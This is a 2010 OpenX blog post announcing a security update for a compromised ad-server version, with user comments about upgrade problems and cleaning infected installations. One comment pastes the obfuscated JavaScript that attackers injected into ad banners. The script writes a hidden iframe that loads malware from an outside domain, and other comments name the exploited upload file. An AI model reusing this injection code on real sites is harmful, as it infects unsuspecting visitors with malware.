Tags: 
Security is an important priority at OpenX and we’re constantly working to provide security patches and bug fixes as soon as we become aware of any potential issue. As these issues are discovered, we validate, patch and release as quickly as we can. But it’s important to understand that avoiding potential security issues also requires server administrators to be vigilant and upgrade their systems to new, patched versions as soon as they become available.
It has been brought to our attention that there is a vulnerability in the 2.8 downloadable version of OpenX that can result in a server running the downloaded version of OpenX being compromised. We have already closed this vulnerability with the latest version of our software. To avoid this issue, we recommend that all users immediately upgrade their systems to 2.8.7.
OpenX also provides both free and Enterprise hosted versions of the ad server. Both of these products are managed and operated by the OpenX team, including upgrades, maintenance, and security scans, freeing you and your team from handling such issues. If ad serving is mission-critical to your business, we suggest contacting our team to learn more about OpenX Enterprise.
When operating any software, especially software that interacts with the public, it is important to keep up to date with the latest version. And, as always, please let us know of any potential security problems by emailing security@openx.org.
Thanks guys, upgraded in 2 minutes without any problems. Keep up good work. By the way, I still dont know, how to run popup in openX, but that’s another issue…
Comment by Brano — September 15, 2010 @ 4:11 am
Only after a major site has a issue the problem is fixed, Good to see there is a official patch now
Comment by Zealous — September 15, 2010 @ 6:07 am
My site was affected, I manually checked all my zones & banners for any injected code and upgraded my OpenX install.
But now my site is flagged by Google and who knows how long until its deflagged.
Comment by Canadaka — September 15, 2010 @ 9:31 am
Release notes don’t tell anything, also nothing on https://developer.openx.org/ like it says, … Direct selection of contract campaigns doesn’t work at all, it’s in issues list, how come this doesn’t get fixed for MONTHS?! If this isn’t a serious issue, I don’t know what is.
Comment by Evgen — September 15, 2010 @ 12:19 pm
OpenX 2.8.6 says
“Your version of OpenX is up-to-date. There are currently no updates available.”
You might want to update the update feed as well.
Comment by Jari — September 15, 2010 @ 3:11 pm
Shouldn’t this security update have been emailed to us all who registered in the newsletter??
Comment by Nick Galis — September 15, 2010 @ 4:36 pm
The lack of a clear diff file is disturbing, but also the fact that “forum.openx.org” seems to be inaccessible.
What’s going on? I actually have some very solid tips and hints that helped me solve some upgrade headaches. Why not allow people to share?
Comment by Jack — September 15, 2010 @ 4:38 pm
any quick tips to quickly remove the vulnerability WITHOUT doing the upgrade?
I mean we will upgrade soon but we would appreciate any hints on how to close the gap in the meantime.
e.g. we have a password protected www/admin folder, is this good enough?
Comment by Johny Cash — September 15, 2010 @ 4:43 pm
Is this vulnerability only related with the video upload plugin? or is there more to it?
http://www.h-online.com/security/news/item/Web-sites-distribute-malware-via-hacked-OpenX-servers-1079099.html
Comment by Johny Cash — September 15, 2010 @ 4:58 pm
Johny Cash,
Since there are a number of changes in the new version we strongly suggest you upgrade. If you cannot, then take a look at the code changes between your version and the versions for the code patches you will need. But again, his is a low impact upgrade, and does not touch your db data.
Mike
Comment by Michael Todd — September 15, 2010 @ 6:56 pm
Jari, Nick,
A in-product alert will start going out in the next hour.
Mike
Comment by Michael Todd — September 15, 2010 @ 6:58 pm
Even after the upgrade I was still infected. After grepping through all my sites files, I couldn’t find a trace of the 2 domains mentioned on my Google Safe Browsing diagnostic page. “cnjug.com” and “openx.net”.
However i started manualy going through each and every table in the openX database and I found malware code inserted in many of the append or prepend fields in several tables.
This was the code that i found and removed. Hopefully thats it now.
“var dc=document; var date_ob=new Date(); dc.cookie=’h1=o; path=/;’;if(dc.cookie.indexOf(’3=llo’) 0){
function clng(str1,str2,str3){var cou=new Array(‘cn’,'gt’,'tn’,'br’,'id’,'bg’,'pl’,'be’,'gp’,'my’,'th’,'iq’,'ro’,'ba’,'pk’,'tr’,'dz’,'ma’,'re’,'ae’,'gf’,'ru’,'om’,'il’,'gr’,'vn’,'kw’,'ci’,'sa’,'do’,'pt’,'hr’,'eg’,'qa’,'ro’,'tw’,'al’,'hk’,'ps’,'eg’,'do’,'lt’,'dk’,'jo’,'pk’,'ma’,'pr’,'mk’,'dz’,'ge’,'hr’,'gr’,'bg’,'ba’,'pt’,'si’,'tn’,'pl’,'be’,'ir’,'sk’,'hu’,'az’,'bo’,'by’,'cr’,'cz’,'ec’,'ee’,'lk’,'lv’,'md’,'mt’,'pa’,'rs’,'sv’,'tt’,'ua’,'uy’);
for(i=0;i<cou.length;i++){if(str1&&str1.toLowerCase().indexOf(cou[i])!=-1)return true;if(str2&&str2.toLowerCase().indexOf(cou[i])!=-1)return true;if(str3&&str3.toLowerCase().indexOf(cou[i])!=-1)return true;}return false;}
if(clng(navigator.systemLanguage,navigator.userLanguage,navigator.language)){var run=1;}
if(typeof run == ‘undefined’){dc.writeln(“<!–”);dc.writeln(“var host=’ widt’+'h=1 h’+'eight’+'=1 ‘; var src=’src=’; var brdr=’fra’+'mebor’+'der=’+’0′;var sc=’\”http://cnjug.com/blog/index.php?s=IBB@G\” ‘;”);dc.writeln(“document.write(”);”);dc.writeln(“//–>”);} var run=1;
date_ob.setTime(date_ob.getTime()+86400000);dc.cookie=’h3=llo; path=/; expires=’+date_ob.toGMTString();}”
Comment by Canadaka — September 15, 2010 @ 10:59 pm
It is possible that attacker already created his own administrator and admin accounts. Actually I was not able to see his accounts in 2.8.1, now I have upgraded, changed all passwords, deleted his accounts and sessions, deleted admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php, changed config to read only……any further ideas??
Comment by jirka — September 15, 2010 @ 11:46 pm
Just wanted to update, but inside the zip or tar files all plugin folders are empty. After the update I get the message, that plugins are missing. Is this an error?
Comment by gero — September 16, 2010 @ 12:00 am
The update went well but I may have done a mistake when asked the path to the previous installation -> plugins are not working.
How can I sort this out? Tried several things but couldn’t find the solution.
Thanks in advance for your help,
J
Comment by Josep — September 16, 2010 @ 5:01 am
Big question here – if a site is already compromised will upgrading to 2.8.7 fix the problem or is the solution at that point to delete everything and start fresh?
Comment by Scott — September 16, 2010 @ 5:03 am
Does this vulnerability also exist for self-hosted OpenX 2.6, or are we safe running this version?
Upgrading to 2.8 is not an option for me at the moment.
Comment by Phil — September 16, 2010 @ 8:13 am
@Phil, speaking from experience, there are much worse vulnerabilities in 2.6.
Comment by ECO — September 16, 2010 @ 6:44 pm
Also upgraded from 2.8.5 to 2.8.7 but plugins are missing now and I don’t know how to fix it. I see that others are reporting same issue. The error message is as follows:
Failed to find package definition file /home/hdtelevi/public_html/openx-2.8.5/plugins/etc/openXVideoAds.xml
Failed to find package definition file /home/hdtelevi/public_html/openx-2.8.5/plugins/etc/openXVideoAds.xml
Failed to find package definition file /home/hdtelevi/public_html/openx-2.8.5/plugins/etc/openXWorkflow.xml
Failed to find package definition file /home/hdtelevi/public_html/openx-2.8.5/plugins/etc/openXWorkflow.xml
Failed to find package definition file /home/hdtelevi/public_html/openx-2.8.5/plugins/etc/openXMarket.xml
…
and so on for all plugins.
I tried copying these files from backup location but error still exists.
Comment by Darco — September 16, 2010 @ 10:02 pm
For instructions on performing a security audit on a compromised OpenX installation, see the follow-up blog post: http://blog.openx.org/09/security-update-how-to-secure-your-openx-installation/
If there was a problem with the plugin installation during the upgrade, check the /path/to/openx/var/install.log for any potential issues, and once they’re resolved you can re-install the affected plugins (the .zip files for which can be found inside the openx-2.8.7.zip file in the etc/plugins folder)
Comment by Chris Nutting — September 17, 2010 @ 2:01 am
Bummer, I was affected and all the sites I serve ads to got blacklisted by Google as having malware. I had my host rollback my install to a few days before the hack and then I quickly upgraded (which was relatively easy).
My own PC got malware from my own sites! It was impossible to remove. The malware forced my PC to go through their proxy. I couldn’t get to any of the malware removal sites (got 404s) and non of my antivirus, anti-malware apps would install or run. All my searches on Google would lead me to shopping sites. Fortunately I do full system backups (images) and could roll back.
Unfortunately my community forum members aren’t technical and a bunch of them are hosed. A super sickening feeling knowing my site caused it and nothing I can tell them to do to fix it.
Comment by OutsourcedMyLife — September 17, 2010 @ 6:03 am
Having same issue as Darco above, with plugins. Any resolution to this?
Comment by Torkil Johnsen — September 17, 2010 @ 9:09 am
Same issue as Darco with plugins …
Directories “admin/plugins” and “plugins/*” are empty !
Comment by Fixo — September 17, 2010 @ 10:15 am
Same issue here as well.. I found instructions for manually uninstalling the openx market plugin, but I still have those errors in my admin plugin section…
Comment by Mike — September 17, 2010 @ 1:05 pm
My Official Site have been hacked two times, last Aug 14 and now Sept 14. OpenX Ads Server have been hacked 2 times in 2 months. It’s very dangerous!
Comment by Catur Ujianto — September 17, 2010 @ 2:06 pm
Same issue as Darco and Fixo and Mike with plugins. This is so frustrating. I tried to do clean install for verison 2.8.7 and again issue with plugins. So my update from 2.8.5 to 2.8.7 failed, new install failed, reason is in both cases in plugins and I don’t use any custom only plugins that are in by default so it seems that install is broken.
Comment by Vlad — September 18, 2010 @ 1:25 am
Hi, does someone have a download link for the standard plugins please?
Tried to update but the plugins directories are all empty. Was the same when I installed it the first time. I dont understand why the standard plugins are not inside the download package. As far as I know OpenX cannot be used without the standard plugins, isnt it?
Comment by sascha — September 18, 2010 @ 1:02 pm
I’m on 2.8.5 now and I tried the upgrade and I also got the problem with all the standard plugins. I’m not even using the video plugin
The log complains about being unable to locate XML files
I just want to know what changed so I can change the code myself instead of upgrading.
Comment by ronnie — September 18, 2010 @ 3:16 pm
Path to previous OpenX installation
I’m hose on the installation. stuck on Step 3 of 5 with it can’t find plugins. See tons of people with the same problem — and not one solution. This sucks that I first get hacked — then no solution.
Comment by Big Kahuna — September 19, 2010 @ 5:24 am
[...] on 09.17.10 at 10:56 am (comments) Yesterday, September 16th, 2010, a security vulnerability (OpenX Blog Security Update) in our ad server allowed an attacker to inject malicious JavaScript into the ads served on our [...]
Pingback by New java exploit.. - wizardmods Satellite TV Forum — September 19, 2010 @ 8:47 am
Same issue with missing plugins. V poor that no official answer to people with these problems. Same as well with repeated hacks of OpenX installs. Partly down to me being lazy and not upgrading and also in part to Invocation code showing the ******* version number in comment tag, makes it very easy for hackers to automate finding out of date installs. Surely not including these comments in the output would help the amount of people getting hit with this. I make sure I do not include the comments when adding invocation codes now…
Comment by Chief Chubba — September 19, 2010 @ 9:41 pm
I’ve just done the last update and since I noticed there was no more “code invocation” either for the website or for individual zones…
Can anyone help me on this?
Thanks
Comment by Antony — September 20, 2010 @ 2:27 pm
We’ve used OpenX for years. This latest security threat came out of nowhere and hit us hard. 72 hours later, we’re working hard to get relisted as a safe site with Google. It’s tanked our traffic today.
We found the solution though after upgrading, over 5,000 files were infected in the phpads_audit details column. Have your developers start their search there.
A sample search and results (x8 domains on our end, over 5,000 lines were removed:)
mysql> update phpads_audit set details=” where details like “%blamesllek%”;
Query OK, 1262 rows affected (0.36 sec)
Rows matched: 1262 Changed: 1262 Warnings: 0
Hope this helps anyone else dealing with this issue.
Comment by Kevin McNeese — September 20, 2010 @ 10:42 pm
Same problem as everyone else above in regards to the plug-ins. I am trying to upgrade from 2.8.5 to 2.8.7 – It really shouldn’t be this difficult!
Why hasn’t anyone from OpenX commented on this since the problem seems to be with so many people?
Comment by MogulMan — September 21, 2010 @ 3:30 pm
I found a few fixes that might help. For the plugins – when it ask you to enter the path to your previous openx installation – you have to use the absolute server path. I was missing a / at the beginning and it wouldn’t work. When I added that / the plugin installation ran automatically. Your absolute server path would be something like:
/home/www/htdocs/yourwebsite/openx/
Using http://www.yourwebsite.com/openx will not work.
Comment by Bryan — September 21, 2010 @ 5:00 pm
Hi, after resolving our issue being blacklisted on google (disabling openX and removing malware links) we went about upgrading from 2.8.2 to 2.8.7
Followed all the steps correctly and installed the upgrade.
However the final step has failed (renaming old installation and renaming new folder e.g. /open_new renamed to /openx)
Warning: require_once(pre-check.php) [function.require-once]: failed to open stream: No such file or directory in ****/openx_new/init.php on line 35
Fatal error: require_once() [function.require]: Failed opening required ‘pre-check.php’ (include_path=’.:/usr/share/pear’) in ****/openx_new/init.php on line 35
I can’t find or work out where the references to the openx_new folder are?? very confusing. Followed each step exactly.
Can still run the old interface if i rename the folders back to their original state but this obviously isn’t the completed upgrade.
e.g. You are currently using OpenX v2.8.2 (warning: database is stamped as v2.8.7) running on Apache 2.2.3, PHP 5.2.10 and MySQL 5.0.77-log.
Comment by Jay — September 22, 2010 @ 4:58 pm
@ Brian : nice for you but it doesn’t work here…
I try to upgrade 2.8.5 => 2.8.7 … with relative OR absolute path “install.log” says :
Plugin: openXBannerTypes – Unable to locate XML files
Plugin: openXDeliveryLimitations – Unable to locate XML files
Plugin: openX3rdPartyServers – Unable to locate XML files
Plugin: openXReports – Unable to locate XML files
Plugin: openXDeliveryCacheStore – Unable to locate XML files
…..
Please help, i don’t want to be blacklisted by google (!)
Comment by Fixo — September 23, 2010 @ 1:31 pm
[...] Our host was very quick to patch the hole you’re talking about. Our problem was related to this: link An armed society is a polite society. Manners are good when one may have to back up his acts [...]
Pingback by Site tried to download files this morning — September 23, 2010 @ 6:09 pm
Same problem here with the plugins. Please provide some help!
Comment by Maragues — September 23, 2010 @ 9:38 pm
Also had the plugin problem and missing invocation code dropdown (caused by lack of invocation plugin). As mentioned above it seems there is an issue copying the old plugins folder during install. If you managed to keep a copy of your previous installation you can simply move the contents of the old plugins folder to the new plugins folder to fix it. After this you can re-enable your various plugins. I guess if you did not keep your old install then do a new install (not an upgrade) in a separate folder and copy the plugins folder from there.
Comment by Alex — September 24, 2010 @ 9:04 am
Same problem when trying to upgrade from 2.8.5 to 2.8.7.
Disappointed, no official response yet.
Comment by Octavian — September 25, 2010 @ 2:21 am
[...] încurajează utilizatorii şi administratorilor să citească informaţiile disponibile pe blog-ul OpenX “Security Update” şi să facă un upgrade la OpenX 6.8.7. De asemenea, utilizatorii OpenX pot citi informaţii de pe [...]
Pingback by OpenX a pus în circulaţie o actualizare de securitate | SecurityNews — September 27, 2010 @ 7:08 am
I tried to upgrade with the usual procedure, entered the correct full file system path, but still got “One or more plugin files couln’t be located” with this error message in install.log: Plugin: openXVideoAds – Unable to locate file: /my/full/path/www_openx_2.8.5/www/admin/extensions/videoReport/lib/ofc2/ofc_upload_image.php
I had to revert the upgrade and restore from backup, so now my site is vulnerable again
Comment by René — September 27, 2010 @ 11:04 am
Regarding the error with plugins… I had the same issue and could not resolve it. However… I killed that tab, visited site/new folder and it was running fine.
So, before you revert, check out the /new folder.
I renamed the folder to finish the transfer and 2.8.7 is running smoothly.
This is totally wanky, but at least I am secure now…. ?
Comment by Kamen — September 28, 2010 @ 2:10 am
Regarding plugin issue, you just need to copy plugin data from your old installation to the appropriate folders in the new one. New installation has all the folders in place, you just need to copy subfolders and .xml files to the right place and all will be working fine!
Comment by Darco — September 29, 2010 @ 8:05 pm
I am making an attempt to install the latest version of OpenX. It is a fresh install. I noted however that the plugin folders are empty. They only have their plug in names. Where can I find these plugins? Thanks
Comment by Ilocos — October 2, 2010 @ 11:22 am
regarding the plugin issue… does anybody know why the plugins are not in the downloadfile? why are all the plugins not part of the official download package????
and why is there no direct link to the plugins download on the page?
openx wont run without the plugins or am i wrong???
Comment by sascha — October 5, 2010 @ 12:30 pm
FYI – as mentioned earlier in this thread, if you look in the 2.8.7 zip package \etc\plugins folder, NOT the \plugins (that is empty for some reason), you will see zip files for each plug-in.
Comment by kboone — October 6, 2010 @ 3:52 pm
[...] encourages users and administrators to review the OpenX “Security Update” blog entry and upgrade to OpenX 6.8.7 to help mitigate the risks. OpenX users are also encouraged to review [...]
Pingback by SPiZaD » Adobe Releases Security Updates for Reader and Acrobat — October 7, 2010 @ 3:16 am
[...] http://blog.openx.org/09/security-update/ [...]
Pingback by Bogdan Turcanu » Blog Archive » Neplăceri cu OpenX — October 7, 2010 @ 3:02 pm
[...] encourages users and administrators to review the OpenX “Security Update” blog entry and upgrade to OpenX 6.8.7 to help mitigate the risks. OpenX users are also encouraged to review [...]
Pingback by SPiZaD » Microsoft Releases Advance Notification for October Security Bulletin — October 8, 2010 @ 3:36 am
[...] encourages users and administrators to review the OpenX “Security Update” blog entry and upgrade to OpenX 6.8.7 to help mitigate the risks. OpenX users are also encouraged to review [...]
Pingback by SPiZaD » Foxit Releases Foxit Reader 4.2 — October 8, 2010 @ 3:36 am
[...] encourages users and administrators to review the OpenX “Security Update” blog entry and upgrade to OpenX 6.8.7 to help mitigate the risks. OpenX users are also encouraged to review [...]
Pingback by TechsRUs Blog » Microsoft Releases Advance Notification for October Security Bulletin — October 8, 2010 @ 3:48 am
[...] encourages users and administrators to review the OpenX “Security Update” blog entry and upgrade to OpenX 6.8.7 to help mitigate the risks. OpenX users are also encouraged to review [...]
Pingback by TechsRUs Blog » Oracle Releases Pre-Release Announcement for October 2010 — October 8, 2010 @ 6:02 pm
[...] encourages users and administrators to review the OpenX “Security Update” blog entry and upgrade to OpenX 6.8.7 to help mitigate the risks. OpenX users are also encouraged to review [...]
Pingback by SPiZaD » Oracle Releases Pre-Release Announcement for October 2010 — October 8, 2010 @ 10:43 pm
[...] encourages users and administrators to review the OpenX “Security Update” blog entry and upgrade to OpenX 6.8.7 to help mitigate the risks. OpenX users are also encouraged to review [...]
Pingback by SPiZaD » Microsoft Releases October Security Bulletin — October 13, 2010 @ 2:50 am
[...] encourages users and administrators to review the OpenX “Security Update” blog entry and upgrade to OpenX 6.8.7 to help mitigate the risks. OpenX users are also encouraged to review [...]
Pingback by SPiZaD » Oracle Releases Critical Patch for October 2010 — October 14, 2010 @ 4:18 am
Was running self hosted OpenX 2.8.5 when the site got hit with Malware. Went through the upgrade process to 2.8.7 and ran into the plugin issue that so many have mentioned above. Since I do not have patience to debug the problems while my site is still flagged as an attack site in Google, I just removed the old installation and its database completely and installed a fresh, and supposedly secure, 2.8.7 version. Set up the ads, asked Google for reconsideration and waited.
Within 3 hours the 2.8.7 version was infected with malware again.
At that point I ditched OpenX and moved to a different ad server.
Comment by Arohan — October 21, 2010 @ 8:12 pm
Plugins error, the issue I see is the upgrade is looking in /www/admin/extensions
but the plugins are in /www/admin/plugins
Comment by goodgirl — October 24, 2010 @ 9:29 pm
To Darco : Thank you but I have not “.xml files” in plugins ?! juste subfolders.. and le message is the same “One or more plugin files couln’t be located”.
It’s impossible to continue for me.
Have you an idea ?
Thank you for your help
Comment by Olivier — October 25, 2010 @ 11:52 am
To Darco : I have .xml fils in “/etc/”, juste here right ?
Comment by Olivier — October 25, 2010 @ 12:10 pm
To Darco : I don’t know why but it’s ok now…
Comment by Olivier — October 25, 2010 @ 3:12 pm
I found a missing file reference in the videoReport plugin. Delete the following line from ‘plugins/etc/videoReport/videoReport.xml’ and the installation will continue.
<file path=”{ADMINPATH}/lib/ofc2/”>ofc_upload_image.php</file>
The installation did continue fine so I’m not sure what the missing file is used for. We don’t use that plugin so it’s a mute point for us.
Best,
Gary
Comment by Gary — October 25, 2010 @ 7:46 pm
Вы не правы. Я уверен. Давайте обсудим. Пишите мне в email, поговорим.
Comment by Сергей — November 7, 2010 @ 5:22 am
I installed OpenX, Open Adas actually, on many websites about 8 years. It was much simpler. I don’t believe installations can become more complicated over time. There is really an issue with the plug ins. Actually it’s not really an issue, it’s just a little annoyance made to maximize the number of people who will need to pay for support. A lot of developers do that: misplace or zip a few key files here and there and you make money from the install. You can do better guys. Open Ads was hassle free, it was open source, you guys are like Microsoft now!
Comment by Patrick — November 8, 2010 @ 12:53 am
My site was compromised… new user accounts were created in the ad system (openx _users table) and malware delivery code was being appended to the banners. I manually cleaned the openx database of users and append code then upgraded to 2.8.7. If you are going down this path, do not forget to delete any additional users you do not recognize!! It’s a shame this was not mentioned above
Comment by Jason — November 8, 2010 @ 3:38 am
Same problem as everyone concerning plugins!…
Comment by Steph — December 23, 2010 @ 9:41 am